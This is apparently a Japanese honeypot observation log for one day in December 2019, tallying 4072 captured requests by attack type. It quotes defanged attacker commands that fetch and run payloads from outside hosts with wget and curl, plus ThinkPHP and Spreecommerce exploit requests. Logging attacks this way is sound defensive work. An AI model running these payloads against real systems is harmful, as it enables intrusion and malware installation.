WOWHoneypot観察(273日目)
2019/12/14(土)
トータルは4072件でした。
ハンティングログは以下です。
208.97.139[.]112 wget hxxp[:]//145.249.106[.]241/richard; curl -O hxxp[:]//145.249.106[.]241/richard |
208.97.139[.]112 curl -O hxxp[:]//145.249.106[.]241/richard |
www.virustotal.com
www.virustotal.com
208.97.139[.]112 wget hxxp[:]//80.82.64[.]14/richard |
185.255.210[.]58 wget${IFS}-qO-${IFS}hxxp[:]//104.244.75[.]222/b |
www.virustotal.com
www.virustotal.com
件数 | 概要 | リクエスト |
---|---|---|
4003 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
38 | アクセス | GET / |
3 | SpringDataCommonsの脆弱性を狙った通信 | POST /users?page=&size=5 |
3 | ThinkPHPの脆弱性を狙った通信 | POST /TP/public/index.php?s=captcha |
3 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 |
3 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php |
2 | DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 | POST /editBlackAndWhiteList |
2 | WordPressに対するログイン試行 | POST /wp-login.php |
2 | WordPressに対するログイン試行 | GET /wp-login.php |
2 | IPカメラの脆弱性を狙った通信 | GET /system.ini?loginuse&loginpas |
1 | 不正中継の調査 | GET hxxp[:]//ipinfo.io/json |
1 | 不明 | GET /login/submit/onlyy |
1 | WCF URLの調査 | GET /Temporary_Listen_Addresses/SMSSERVICE |
1 | Spreecommerceの脆弱性を狙った通信 | GET /?search[send]=eval&search[send]=Kernel.fork%20do%60wget%20hxxp%3A%2F%2F145.249.106.241%2Frichard%3B%20curl%20-O%20hxxp%3A%2F%2F145.249.106.241%2Frichard%3B%20chmod%20%2Bx%20richard%3B%20sh%20richard%60end |
1 | phpMyAdminの調査 | GET //pma/scripts/setup.php |
1 | phpMyAdminの調査 | GET //phpmyadmin/scripts/setup.php |
1 | phpMyAdminの調査 | GET //phpMyAdmin/scripts/setup.php |
1 | phpMyAdminの調査 | GET /muieblackcat |
1 | phpMyAdminの調査 | GET //myadmin/scripts/setup.php |
1 | phpMyAdminの調査 | GET //MyAdmin/scripts/setup.php |
1 | 管理者情報の調査 | GET //admin/config.php?password%5B0%5D=ZIZO&username=admin |